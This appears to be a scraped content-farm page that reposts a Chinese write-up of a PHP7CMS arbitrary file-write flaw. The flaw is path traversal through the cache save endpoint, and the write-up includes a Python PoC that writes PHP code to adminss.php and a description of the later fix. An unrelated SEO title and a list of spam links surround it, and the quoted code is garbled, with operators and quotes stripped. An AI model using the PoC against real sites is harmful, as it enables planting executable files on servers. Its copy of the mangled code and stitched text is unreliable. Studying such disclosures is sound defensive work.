当前位置: 首页 > news >正文

个人信息网站建设方案书框架栏目免费快速建站工具

个人信息网站建设方案书框架栏目,免费快速建站工具,个人网站免费申请,网页价格是什么意思Version:2018-10-09//最新版中以修复此漏洞这个漏洞很简单#xff0c;如果作者在写代码的时候考虑到一点点安全方面#xff0c;其实都可以避免的。[PHP] 纯文本查看 复制代码// php7cms/Core/Controllers/Api/Api.php// 52~61 linepublic function save_form_data() {$rt \P…Version:2018-10-09//最新版中以修复此漏洞这个漏洞很简单如果作者在写代码的时候考虑到一点点安全方面其实都可以避免的。[PHP] 纯文本查看 复制代码// php7cms/Core/Controllers/Api/Api.php// 52~61 linepublic function save_form_data() {$rt \Phpcmf\Service::L(cache)-init(file)-save(\Phpcmf\Service::L(Input)-get(name),\Phpcmf\Service::L(Input)-post(data),7200);var_dump($rt);exit;}调用了Cache类中 init 函数参数分别为get(‘name’)和post(‘data’)。[PHP] 纯文本查看 复制代码// php7cms/Fcms/Library/Cache.php// 112~121 linepublic function init($handler , $prefix site-.SITE_ID.-) {$config new \Config\Cache();$config-handler file;$config-prefix $prefix;!$config-prefix $config-prefix site-.SITE_ID.-;$config-path WRITEPATH.caching/;$cache \Config\Services::cache($config, 0);return $cache;}初始化缓存类为prefix参数拼接字符串后直接无任何过滤直接传入CI框架的缓存类中中间框架的执行流程就不在文章里写了。直接看最后一步[PHP] 纯文本查看 复制代码// php7cms/System/Cache/Handlers// 107~125 linepublic function save(string $key, $value, int $ttl 60){$key $this-prefix . $key;$contents [time time(),ttl $ttl,data $value,];if ($this-writeFile($this-path . $key, serialize($contents))){chmod($this-path . $key, 0640);return true;}return false;}[PHP] 纯文本查看 复制代码//324~345 lineprotected function writeFile($path, $data, $mode wb){if (($fp fopen($path, $mode)) false){return false;}flock($fp, LOCK_EX);for ($result $written 0, $length strlen($data); $written $length; $written $result){if (($result fwrite($fp, substr($data, $written))) false){break;}}flock($fp, LOCK_UN);fclose($fp);return is_int($result);}直接写入到缓存目录中其中并没有过滤”.”和”/”可以跨目录写入。所以不需要考虑路由问题。POC[PHP] 纯文本查看 复制代码from requests import postpostData {data:?php phpinfo()?}postTest post(http://localhost//index.php?sapicapimsave_form_dataname/../../../adminss.php,datapostData)-1.png (123.79 KB, 下载次数: 23)2018-12-14 13:05 上传新版修复:3.png (27.21 KB, 下载次数: 28)2018-12-14 13:07 上传首先给dr_safe_replace 参数增加了两个新的过滤条件 ” . “和 ” ‘ “在原本漏洞出发点接收get值的时候用这个函数过滤。03.png (35.6 KB, 下载次数: 26)2018-12-14 13:07 上传
http://www.yutouwan.com/news/203094/

相关文章:

  • 深圳建设岗位证书报名网站做网站展示软件
  • 中国建设人才服务信息网站微信小程序与网站连接
  • 网站制作 培训wordpress的主题文件夹
  • 陕西省交通建设集团商界分公司网站成都网页设计与网站建设
  • 手机端移动网站建设宁波最好的seo外包
  • 推荐微信网站建设查看一个网站开发语言
  • 网站外部优化的4大重点oa系统办公软件怎么用
  • 欧美网站模板 psd摄影婚纱官网
  • 网站开发验收过程外贸网站建设的重要性
  • 企业名称查询网站建设部监理资质申报网站
  • 做个ppt模板网站开发wordpress汉化包
  • 泉州网站建设价钱php项目开发案例源码
  • p2p理财网站开发流程图营销软件知名乐云seo品牌
  • 网站开发待遇好吗wordpress 菜单栏调用
  • 凡科登录网站手机版写软文怎么接单子
  • 九江市住房与城乡建设厅网站企业管理咨询论文
  • 北京做网站youyi51培训平台
  • 新桥企业网站建设网站制作的公司有哪些
  • 行业协会网站建设方案书环保设备网站建设模板
  • 长沙米拓建站深圳建设工程交易网站
  • 光纤做网站 移动不能访问电信WordPress表情问题
  • 国外扁平化风格网站云南网站备案
  • 网站维护什么情况掘金网站建设
  • 自己有网站怎么做点卡福州外贸网站建设推广
  • 企业网站建设及前期准备网站如何做路由器
  • 小型网站开发教程深圳网站制作西安
  • 网站制作网站推广linux下网站开发
  • 项目网站免费数据统计网站
  • iis网站出乱码做我的世界头像的网站
  • 产地证哪个网站做开发公司直接发包绿化景观